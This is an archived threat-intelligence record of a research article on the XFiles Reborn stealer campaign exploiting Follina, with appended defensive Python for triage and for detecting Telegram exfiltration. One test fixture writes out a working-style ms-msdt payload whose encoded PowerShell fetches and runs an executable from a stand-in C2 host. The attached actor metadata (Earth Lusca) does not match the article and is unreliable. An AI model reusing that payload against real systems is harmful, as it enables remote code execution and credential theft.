{
	"id": "a573a31d-b9fb-472d-a3ac-5fb49efef3be",
	"created_at": "2026-04-06T01:32:07.23764Z",
	"updated_at": "2026-04-10T03:36:47.962804Z",
	"deleted_at": null,
	"sha1_hash": "8b29022bf08e55ce7e7533bf762eaa1193039587",
	"title": "XFiles Stealer Campaign Abusing Follina",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 54622,
	"plain_text": "XFiles Stealer Campaign Abusing Follina\r\nBy Shmuel Gihon\r\nPublished: 2022-07-03 · Archived: 2026-04-06 00:21:17 UTC\r\nResearch\r\nExecutive Summary\r\nAs many threat actors and groups rush to weaponize recently disclosed vulnerabilities, the Cyberint Research Team found several XFiles stealer campaigns in which the Follina vulnerability was exploited as part of the delivery phase.\r\nFollina (CVE-2022-30190, a flaw in the Microsoft Support Diagnostic Tool, MSDT) is one of the most widely exploited vulnerabilities disclosed in 2022. It gives a threat actor remote code execution (RCE) through a malicious Word document: the document loads attacker-hosted HTML, and that HTML invokes the ms-msdt: protocol handler with a crafted parameter that MSDT hands to PowerShell, so no macros are needed.\r\nXFiles stealer is a widely used info stealer that took off at the end of 2021. The group that sells the stealer operates out of the Russia region and is currently looking to expand.\r\nRecent evidence suggests that threat actors worldwide abuse the Follina vulnerability in their campaigns to deliver the XFiles info stealer, which has become popular even among veterans.\r\nFigure 1: XFiles Reborn stealer ad on an underground forum\r\nPurchasing\r\nThis campaign consists of two major components: the delivery module, which includes the Follina exploits, and the XFiles info stealer sample.\r\nFollina Exploits\r\nAs expected, once the Follina vulnerability was published its use became widespread, because exploitation is simple and the effect when successful is severe. Many exploit developers and underground vulnerability researchers offered exploits abusing Follina, for sale or even for free (Figures 2, 3).\r\nFigure 2: Threat actor publishing a fully undetected exploit builder for 3.5K USD\r\nFigure 3: Exploit being advertised in a Telegram channel for free\r\nMost sellers offer malicious documents exploiting this vulnerability to fulfill the buyer’s end goal. 
The prices vary, depending on the developer’s reputation and the level of detection.\r\nXFiles Reborn Information Stealer\r\nhttps://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/\r\nPage 1 of 5\n\nXFiles developers currently operate several Telegram channels and bots to fully support their customers: a news channel, an updates channel, a shopping bot, a direct chat with the seller and a general chat for customers.\r\nThe subscription plans they currently offer are 5, 10 or 20 USD for a week, a month or six months, respectively.\r\nXFiles Reborn Panel\r\nAlthough the XFiles Reborn group recommends using Telegram as the panel for collecting information from the stealers, they also offer to set up a “classic” web panel on a C2 server supplied by the seller (Figures 4, 5).\r\nFigure 4: XFiles Reborn stealer’s panel login page\r\nXFiles Reborn Group\r\nThe XFiles Reborn group started its operations in March 2021.\r\nThe group reminds us of another fairly new yet ambitious group, Jester [1], in that they put a lot of effort into publicity. They also go the “extra mile” to stand out from other info stealer operators. Simplicity and efficiency is the name of the game.\r\nBefore they had a respectable number of subscribers on their Telegram channels, the XFiles Reborn group advertised on the notorious underground forum “Lolz.Guru” (Figure 6).\r\nFigure 6: XFiles Reborn group’s first post on lolz.guru\r\nThreat Actors Recruitment\r\nTo expand their operation, they appear to be constantly recruiting new members, mostly ones who already have experience with info stealers.\r\nDuring the past year, a threat actor created a new info stealer named Whisper Project. The campaign ran for a couple of months and started to gain subscribers.\r\nWhisper Project was short-lived but looked very professional and seemed to have the potential to become quite popular. 
As XFiles Reborn was looking to expand, they made efforts to recruit the individual behind Whisper Project. Once they succeeded, Whisper Project died with an announcement by its creator that he had joined the XFiles Reborn team (Figure 7).\r\nFigure 7: Whisper Project creator announces shutting down the operation and joining XFiles Reborn\r\nPunisher Miner\r\nThis ambitious group is not only expanding its personnel but also adding new products to its shelves. Earlier this year, they introduced the Punisher Miner (Figure 8).\r\nFigure 8: Punisher Miner’s advertisement on an underground forum\r\nThis miner seems fairly sophisticated, as it supports mining Monero, Toncoin and Ravencoin. It is also packed with evasion techniques, such as hiding itself from the Task Manager, delaying execution on startup, and more. Purchasing and building are handled entirely through a dedicated Telegram bot that delivers a built executable once payment is made. The price of the Punisher Miner is 500 rubles, around 10 USD.\r\nXFiles Info Stealer\r\nAlthough the miner was added recently, the group’s flagship is still the info stealer. The stealer targets all Chromium-based browsers, Opera and Firefox, collecting history, cookies, passwords and credit card information.\r\nThe stealer also seeks FTP, Telegram and Discord credentials. In addition, it targets predefined file types located on the victim’s Desktop and takes a screenshot. 
Other clients, such as Steam and crypto-wallets, are also targeted in the process.\r\nTechnical Analysis\r\nInitial Infection\r\nRecent campaigns suggest that the infection process starts with malicious .docx files containing an OLE object that points to the LoadingUpdate.html file on the C2 server (Figure 9).\r\nFirst Stage\r\nThe HTML file contains JavaScript code (Figure 10) that exploits the Follina vulnerability to download the second infection stage, ChimLacUpdate.exe, from the C2.\r\nFigure 10: JavaScript code that exploits Follina\r\nThe JavaScript code includes a base64-encoded string that, once decoded, reveals a PowerShell command that establishes persistence for the newly downloaded file by placing it in the Startup directory (Figure 11) and then executes it.\r\nFigure 11: PowerShell command decoded\r\nSecond Stage\r\nThe second stage is a crucial part of the infection process. The ChimLacUpdate.exe file includes a shellcode runner module that contains hardcoded AES-encrypted shellcode together with the AES decryption key.\r\nOnce decrypted, the shellcode is copied into a memory region of the running process, the region’s protection is changed with the VirtualProtect API call so that it becomes executable (Figure 12), and the shellcode is then executed within the same process.\r\nFigure 12: Shellcode extraction and execution decompiled function\r\nThis method is not new and is considered one of the simpler techniques to identify, although it is sufficient for this particular stage.\r\nThe shellcode itself is another downloader that fetches the XFiles Reborn stealer sample from the same C2 and executes it.\r\nPost Infection\r\nThis part is fairly similar across most info stealers, and XFiles is no different. 
It pursues Discord and Telegram credentials; browsing information such as cookies, passwords and history; FTP client credentials; and, of course, crypto wallets.\r\nIn addition, the XFiles stealer looks for something less common: credit card information stored in browsers.\r\nFinally, in some cases the stealer looks for particular file types, such as .txt and .pdf, and captures screenshots of the victim’s machine.\r\nWorking Directory\r\nXFiles Reborn creates its working directory in the path from which it is running, which in our case was the %APPDATA% directory. The working directory contains two subdirectories:\r\nGrabber – Contains all stolen files and crypto-wallets.\r\nBrowsers – Contains all browsing information, divided into per-browser directories.\r\nThe PCInfo.txt file, which holds the system information of the victim’s machine (Figure 14), is also created in the working directory, along with the captured screenshot.\r\nFigure 14: XFiles Reborn working directory\r\nData Exfiltration\r\nData exfiltration is done via Telegram.\r\nTelegram has become very popular among the new info stealers introduced this year. XFiles Reborn abuses the simplicity and efficiency of Telegram to obtain free, highly anonymous C2 infrastructure.\r\nAt this stage, once the stealer has gathered all the necessary information, it builds a zip archive in memory as a stream (it is never written to disk) and sends it to the threat actor’s preconfigured Telegram bot (Figure 15).\r\nFigure 15: C2 Telegram bot presenting new logs notification\r\nConclusions\r\nThe discovery of the Follina vulnerability provided threat actors with a new tool to weaponize their delivery process. 
It is inevitable that these techniques will appear in ongoing campaigns, especially in the info stealer industry.\r\nOver the past six months, the Cyberint Research Team has witnessed massive numbers of new info stealers introduced to the market.\r\nThe trend of deploying C2 infrastructure on Telegram, which requires minimal effort from operators and developers, is taking over and lowering the level of skill that used to be required of threat actors to establish their own info stealer brand.\r\nThe Cyberint Research Team is convinced that this trend will lead to many more threat actors and info stealer brands in the marketplaces, as other types of malware, such as RATs or even ransomware, follow the trend.\r\nReferences\r\n[1] https://cyberint.com/blog/research/jester-stealer/\r\nSource: https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/"
	],
	"report_names": [
		"xfiles-stealer-campaign-abusing-follina"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439127,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b29022bf08e55ce7e7533bf762eaa1193039587.pdf",
		"text": "https://archive.orkl.eu/8b29022bf08e55ce7e7533bf762eaa1193039587.txt",
		"img": "https://archive.orkl.eu/8b29022bf08e55ce7e7533bf762eaa1193039587.jpg"
	}
}
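The Initial Infection and First Stage sections of the archived article above describe the Follina delivery chain: a .docx whose OLE object points at LoadingUpdate.html on the C2, and HTML whose JavaScript carries a base64-encoded PowerShell command that drops ChimLacUpdate.exe into the Startup directory. The Python below is an added example by the editor, not code from the Cyberint article or from the XFiles operators. It shows the two checks an analyst runs on such a sample: pull external oleObject relationships out of the .docx, and recover the ms-msdt: URI and the decoded PowerShell from the HTML. The .docx, the HTML, the host c2.example and the PowerShell command are constructed fixtures; only the file names LoadingUpdate.html and ChimLacUpdate.exe come from the article.

```python
"""Triage helpers for the Follina delivery chain: .docx -> remote HTML -> ms-msdt: -> PowerShell.

Added example by the editor; not code from the Cyberint article. The .docx and HTML
fixtures are constructed: the host c2.example and the PowerShell command are
placeholders standing in for the real second stage.
"""
import base64
import binascii
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_ole_targets(docx_bytes):
    """Return Target URLs of oleObject relationships marked TargetMode="External".

    A .docx is a zip and Word resolves OLE objects through word/_rels/*.rels. Benign
    documents embed OLE objects inside the archive, so an external http(s) target is
    the delivery indicator (public Follina samples end the URL with '!').
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.startswith("word/_rels/") and name.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                        hits.append(rel.get("Target"))
    return hits


MSDT_RE = re.compile(r"ms-msdt:[^\r\n]+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long enough to be a command, not an identifier


def decode_powershell_blob(b64):
    """Decode base64 destined for PowerShell, whichever text encoding it used.

    -EncodedCommand expects UTF-16LE, while Follina pages usually decode with
    [Text.Encoding]::UTF8.GetString, so the encoding is chosen from the byte pattern.
    """
    try:
        raw = base64.b64decode(b64)
    except binascii.Error:
        return ""
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def analyse_follina_html(html):
    """Report the ms-msdt: URI and every readable PowerShell command encoded in the HTML stage."""
    msdt = MSDT_RE.search(html)
    commands = []
    for m in B64_RE.finditer(html):
        text = decode_powershell_blob(m.group(0))
        # The 'AAAA...' padding Follina pages carry decodes to NUL bytes; keep readable text only.
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            commands.append(text)
    return {"msdt_uri": msdt.group(0).rstrip('";\'\\ ') if msdt else None, "powershell": commands}


def build_sample_docx(target):
    """Constructed fixture: a minimal .docx whose document.xml.rels links an external OLE object."""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{target}" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/styles" Target="styles.xml"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


PS_COMMAND = (  # constructed stand-in for the decoded command the article shows in Figure 11
    '$d="$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"; '
    'Invoke-WebRequest http://c2.example/ChimLacUpdate.exe -OutFile "$d\\ChimLacUpdate.exe"; '
    'Start-Process "$d\\ChimLacUpdate.exe"'
)
UTF16_SAMPLE_B64 = base64.b64encode("Get-Date".encode("utf-16-le")).decode()  # exercises the UTF-16 path

SAMPLE_HTML = (  # constructed, following the structure of public Follina pages
    "<!doctype html><html><body><script>\n"
    "// " + "A" * 100 + "  (stands in for the multi-KB padding public Follina pages carry)\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression('
    "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('"
    + base64.b64encode(PS_COMMAND.encode()).decode()
    + "'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\\"\";\n"
    "</script></body></html>"
)

if __name__ == "__main__":
    print("external OLE targets:", external_ole_targets(build_sample_docx("http://c2.example/LoadingUpdate.html!")))
    report = analyse_follina_html(SAMPLE_HTML)
    print("ms-msdt URI:", report["msdt_uri"])
    for cmd in report["powershell"]:
        print("decoded PowerShell:", cmd)
```

Run `external_ole_targets` over every .docx from the mail gateway rather than on the HTML alone: the document is what reaches the user, and an external oleObject relationship is a decision you can make before the HTML stage is ever fetched. The base64 decoder deliberately accepts both UTF-8 and UTF-16LE because the same PowerShell shows up in both forms depending on whether the exploit author used `-EncodedCommand` or `FromBase64String`.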
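The Working Directory section of the article above gives the on-disk layout XFiles Reborn leaves behind: a Grabber directory, a Browsers directory split per browser, and PCInfo.txt, all created beside the running sample (in the analysed case under %APPDATA%). The Python below is an added example by the editor, not code from the Cyberint article, showing the host-side hunt a responder would run for that layout. The directory tree it scans is constructed in a temporary directory; the decoy folder and the browser names are assumptions for the fixture, and the file contents are placeholders since the article does not show PCInfo.txt verbatim.

```python
"""Hunt for the XFiles Reborn working-directory layout: Grabber/, Browsers/<browser>/, PCInfo.txt.

Added example by the editor, not code from the Cyberint article. On a live Windows host
point it at %APPDATA% (the location the article observed); here a constructed tree in a
temporary directory stands in for the victim profile.
"""
import os
import tempfile

REQUIRED_DIRS = {"Grabber", "Browsers"}
REQUIRED_FILE = "PCInfo.txt"


def find_xfiles_workdirs(root):
    """Return {workdir: sorted per-browser subdirectory names} for every matching directory.

    All three artefacts must sit at the same level; a lone 'Browsers' folder is common in
    legitimate software and would otherwise drown the result in false positives.
    """
    hits = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if REQUIRED_DIRS <= set(dirnames) and REQUIRED_FILE in filenames:
            browsers = os.path.join(dirpath, "Browsers")
            hits[dirpath] = sorted(
                d for d in os.listdir(browsers) if os.path.isdir(os.path.join(browsers, d))
            )
    return hits


def build_sample_tree(base):
    """Constructed fixture: one stealer working directory plus one benign look-alike."""
    work = os.path.join(base, "Roaming", "svc")
    os.makedirs(os.path.join(work, "Grabber"))
    os.makedirs(os.path.join(work, "Browsers", "Chrome"))
    os.makedirs(os.path.join(work, "Browsers", "Firefox"))
    with open(os.path.join(work, REQUIRED_FILE), "w", encoding="utf-8") as fh:
        fh.write("constructed placeholder for the victim system summary\n")
    # Decoy: a Browsers folder without Grabber or PCInfo.txt must not match.
    os.makedirs(os.path.join(base, "Roaming", "SomeApp", "Browsers", "Chrome"))
    return work


def demo():
    """Build the constructed tree in a temporary directory, scan it and return (workdir, hits)."""
    with tempfile.TemporaryDirectory() as base:
        work = build_sample_tree(base)
        return work, find_xfiles_workdirs(base)


if __name__ == "__main__":
    root = os.environ.get("APPDATA")  # real hunt on Windows
    if root and os.path.isdir(root):
        for workdir, browsers in find_xfiles_workdirs(root).items():
            print(f"XFiles-style working directory: {workdir} (browsers: {', '.join(browsers) or 'none'})")
    work, hits = demo()
    print("constructed demo:", hits)
```

When a hit is found, image the directory before touching it: the article notes the archive sent to Telegram is built in memory, so the files in Grabber and Browsers are the only local copy of what was taken and define the scope of credential resets.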
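The Data Exfiltration section of the article above explains that XFiles Reborn zips the collected data in memory and sends it to the operator's preconfigured Telegram bot, which gives the actor free C2 with no infrastructure of their own. The Python below is an added example by the editor, not code from the Cyberint article, demonstrating the network-side detection that follows from this: a Bot API request carries the bot token in the URL path, so a single proxy line identifies both the exfiltration and the operator's bot. The log lines, their column layout (timestamp, client, process, HTTP method, URL, status, bytes), the process name and the bot token are all constructed for the example; the token is not a real Telegram token.

```python
"""Detect info-stealer exfiltration to the Telegram Bot API in web-proxy logs.

Added example by the editor; not code from the Cyberint article. The log lines, the
column layout, the process name and FAKE_TOKEN are constructed for this example.
"""
import re
from collections import Counter

# A Bot API request carries the bot token in its path:
#   https://api.telegram.org/bot<bot_id>:<secret>/<method>
# so one request is enough to attribute the traffic to a specific bot.
TELEGRAM_BOT_RE = re.compile(
    r"https://api\.telegram\.org/bot(?P<token>\d{8,12}:[A-Za-z0-9_-]{30,40})/(?P<method>[A-Za-z]+)"
)
# Methods a stealer uses to ship its logs; the zip archive goes out as sendDocument.
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendMessage"}
# Processes permitted to run legitimate bots; empty here, fill from your own inventory.
ALLOWED_BOT_PROCESSES = set()

FAKE_TOKEN = "5123456789:AAH9kqwx7Q2v9LdE1sPzN4cY8rT0uVbWmXyZ"  # constructed, not a real token

SAMPLE_LOG = f"""\
2022-06-28T10:14:02Z 10.0.4.21 chrome.exe GET https://web.telegram.org/k/ 200 53210
2022-06-28T10:14:05Z 10.0.4.21 ChimLacUpdate.exe GET http://c2.example/ChimLacUpdate.exe 200 401920
2022-06-28T10:14:09Z 10.0.4.21 ChimLacUpdate.exe POST https://api.telegram.org/bot{FAKE_TOKEN}/sendDocument 200 418
2022-06-28T10:14:10Z 10.0.4.21 ChimLacUpdate.exe POST https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage 200 210
2022-06-28T10:15:00Z 10.0.4.33 Telegram.exe POST https://149.154.167.220/api 200 1200
"""


def parse_line(line):
    """Split one constructed proxy record into its fields."""
    ts, client, process, http_method, url, status, size = line.split()
    return {"ts": ts, "client": client, "process": process.lower(),
            "http": http_method, "url": url, "status": int(status), "bytes": int(size)}


def find_telegram_exfil(log_text):
    """Return findings keyed by (client, process, token) for Bot API upload calls.

    The Bot API exists for automation; the human Telegram client never uses it, so a
    desktop process that is not an allow-listed bot host POSTing send* methods is a
    strong stealer signal, and the token in the path names the operator's bot.
    """
    findings = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        m = TELEGRAM_BOT_RE.search(ev["url"])
        if not m or ev["http"] != "POST" or m.group("method") not in UPLOAD_METHODS:
            continue
        if ev["process"] in ALLOWED_BOT_PROCESSES:
            continue
        key = (ev["client"], ev["process"], m.group("token"))
        f = findings.setdefault(key, {"first_seen": ev["ts"], "methods": Counter(), "bytes": 0})
        f["methods"][m.group("method")] += 1
        f["bytes"] += ev["bytes"]
    return findings


def pivot_urls(token):
    """Documented Bot API calls a responder can use with a recovered token.

    getMe returns the bot's username; getUpdates only answers when the operator has no
    webhook configured. Calling them is visible to the operator, so decide first.
    """
    base = f"https://api.telegram.org/bot{token}"
    return {"getMe": f"{base}/getMe", "getUpdates": f"{base}/getUpdates"}


if __name__ == "__main__":
    for (client, proc, token), f in find_telegram_exfil(SAMPLE_LOG).items():
        bot_id = token.split(":")[0]
        print(f"{client} {proc}: {dict(f['methods'])} to bot {bot_id}, first seen {f['first_seen']}")
        print("  pivot:", pivot_urls(token)["getMe"])
```

Blocking api.telegram.org outright is the blunt version of this control and is viable in many corporate environments, since legitimate bot integrations run from servers, not user workstations; where it cannot be blocked, the token-keyed grouping above turns scattered upload events into one finding per infected host and bot.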